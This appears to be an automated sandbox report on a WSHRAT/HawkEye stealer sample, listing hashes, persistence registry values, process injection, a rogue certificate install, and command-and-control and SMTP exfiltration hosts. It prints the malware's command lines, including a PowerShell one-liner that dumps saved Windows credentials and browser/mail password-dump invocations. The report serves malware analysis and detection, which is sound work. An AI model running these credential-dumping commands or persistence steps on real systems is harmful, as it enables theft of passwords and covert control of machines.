US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp

Files

memory/3856-115-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\whhost.exe

MD5 acc6e11d8c5a32242e151a006d9e805b
SHA1 a40cabdc83d96d36437ea9179c6e41c41f7c5177
SHA256 6df4f49c02867044e4aee7dae33fbf9d747ead6fd79a7a2041f558db6225c5d3
SHA512 c93feb5d1b6779fdfa9b23c5b003220584ec605b516d79a0f2d3d4d412781d438c80565099ae4a02773b5fa2410ef3dedd45fd6c680e7ac17c03a97e32c7872d

C:\Users\Admin\AppData\Local\Temp\whhost.exe

MD5 acc6e11d8c5a32242e151a006d9e805b
SHA1 a40cabdc83d96d36437ea9179c6e41c41f7c5177
SHA256 6df4f49c02867044e4aee7dae33fbf9d747ead6fd79a7a2041f558db6225c5d3
SHA512 c93feb5d1b6779fdfa9b23c5b003220584ec605b516d79a0f2d3d4d412781d438c80565099ae4a02773b5fa2410ef3dedd45fd6c680e7ac17c03a97e32c7872d

memory/3856-118-0x0000000002FC0000-0x0000000002FC1000-memory.dmp

memory/3840-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 acc6e11d8c5a32242e151a006d9e805b
SHA1 a40cabdc83d96d36437ea9179c6e41c41f7c5177
SHA256 6df4f49c02867044e4aee7dae33fbf9d747ead6fd79a7a2041f558db6225c5d3
SHA512 c93feb5d1b6779fdfa9b23c5b003220584ec605b516d79a0f2d3d4d412781d438c80565099ae4a02773b5fa2410ef3dedd45fd6c680e7ac17c03a97e32c7872d

C:\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 acc6e11d8c5a32242e151a006d9e805b
SHA1 a40cabdc83d96d36437ea9179c6e41c41f7c5177
SHA256 6df4f49c02867044e4aee7dae33fbf9d747ead6fd79a7a2041f558db6225c5d3
SHA512 c93feb5d1b6779fdfa9b23c5b003220584ec605b516d79a0f2d3d4d412781d438c80565099ae4a02773b5fa2410ef3dedd45fd6c680e7ac17c03a97e32c7872d

memory/3840-122-0x0000000002240000-0x0000000002241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SysInfo.txt

MD5 a80f34b6f1298a5451667153a8b1bf4c
SHA1 bdfcd8eaae53a78c380aa6ae482f079e58fb821b
SHA256 a57523ea244bc61a104d86f04127432cb5480d1a927e976a2ccf46e20b86605c
SHA512 799be13a8a74f82beaf4d02220a44ea519daffe0a1e0fba27801bf84bcefd03e7e5f10400bd4b408975f79142532336df8f3d14696186180ce44b336893a9fb3

memory/3840-124-0x0000000002241000-0x0000000002242000-memory.dmp

memory/4128-125-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4128-126-0x0000000000411654-mapping.dmp

memory/3840-127-0x0000000002244000-0x0000000002246000-memory.dmp

memory/4128-128-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4184-130-0x0000000000442628-mapping.dmp

memory/4184-129-0x0000000000400000-0x0000000000458000-memory.dmp

memory/4184-131-0x0000000000400000-0x0000000000458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\holderwb.txt

MD5 f94dc819ca773f1e3cb27abbc9e7fa27
SHA1 9a7700efadc5ea09ab288544ef1e3cd876255086
SHA256 a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92
SHA512 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196

Analysis: behavioral1

Detonation Overview

Submitted

2021-09-06 22:06

Reported

2021-09-06 22:09

Platform

win7v20210408

Max time kernel

92s

Max time network

176s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\7002991002.js

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

WSHRAT

trojan wshrat

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7002991002.js C:\Windows\system32\wscript.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7002991002.js C:\Windows\system32\wscript.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe N/A

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\7002991002 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\7002991002.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7002991002 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\7002991002.js\"" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1940 set thread context of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 set thread context of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|40707513|QWOCTUPM|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 7/9/2021|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2028 wrote to memory of 108 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\whhost.exe
PID 2028 wrote to memory of 108 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\whhost.exe
PID 2028 wrote to memory of 108 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\whhost.exe
PID 2028 wrote to memory of 108 N/A C:\Windows\system32\wscript.exe C:\Users\Admin\AppData\Local\Temp\whhost.exe
PID 108 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 108 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 108 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 108 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 108 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 108 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 108 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\whhost.exe C:\Users\Admin\AppData\Roaming\Windows Update.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
PID 1940 wrote to memory of 1308 N/A C:\Users\Admin\AppData\Roaming\Windows Update.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\7002991002.js

C:\Users\Admin\AppData\Local\Temp\whhost.exe

"C:\Users\Admin\AppData\Local\Temp\whhost.exe"

C:\Users\Admin\AppData\Roaming\Windows Update.exe

"C:\Users\Admin\AppData\Roaming\Windows Update.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"

C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe

C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM cmdc.exe

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 astatech-cn.com udp
GB 78.110.166.82:80 astatech-cn.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.16.154.36:80 whatismyipaddress.com tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 8.8.8.8:53 mail.pharma-trade.org udp
US 159.89.232.243:7121 159.89.232.243 tcp
BD 203.191.33.181:587 mail.pharma-trade.org tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
BD 203.191.33.181:587 mail.pharma-trade.org tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp
US 159.89.232.243:7121 159.89.232.243 tcp

Files

memory/108-60-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\whhost.exe

MD5 acc6e11d8c5a32242e151a006d9e805b
SHA1 a40cabdc83d96d36437ea9179c6e41c41f7c5177
SHA256 6df4f49c02867044e4aee7dae33fbf9d747ead6fd79a7a2041f558db6225c5d3
SHA512 c93feb5d1b6779fdfa9b23c5b003220584ec605b516d79a0f2d3d4d412781d438c80565099ae4a02773b5fa2410ef3dedd45fd6c680e7ac17c03a97e32c7872d

C:\Users\Admin\AppData\Local\Temp\whhost.exe

MD5 acc6e11d8c5a32242e151a006d9e805b
SHA1 a40cabdc83d96d36437ea9179c6e41c41f7c5177
SHA256 6df4f49c02867044e4aee7dae33fbf9d747ead6fd79a7a2041f558db6225c5d3
SHA512 c93feb5d1b6779fdfa9b23c5b003220584ec605b516d79a0f2d3d4d412781d438c80565099ae4a02773b5fa2410ef3dedd45fd6c680e7ac17c03a97e32c7872d

memory/108-63-0x00000000760B1000-0x00000000760B3000-memory.dmp

memory/108-64-0x00000000002A0000-0x00000000002A1000-memory.dmp

\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 acc6e11d8c5a32242e151a006d9e805b
SHA1 a40cabdc83d96d36437ea9179c6e41c41f7c5177
SHA256 6df4f49c02867044e4aee7dae33fbf9d747ead6fd79a7a2041f558db6225c5d3
SHA512 c93feb5d1b6779fdfa9b23c5b003220584ec605b516d79a0f2d3d4d412781d438c80565099ae4a02773b5fa2410ef3dedd45fd6c680e7ac17c03a97e32c7872d

memory/1940-66-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Windows Update.exe

MD5 acc6e11d8c5a32242e151a006d9e805b
SHA1 a40cabdc83d96d36437ea9179c6e41c41f7c5177
SHA256 6df4f49c02867044e4aee7dae33fbf9d747ead6fd79a7a2041f558db6225c5d3
SHA512 c93feb5d1b6779fdfa9b23c5b003220584ec605b516d79a0f2d3d4d412781d438c80565099ae4a02773b5fa2410ef3dedd45fd6c680e7ac17c03a97e32c7872d

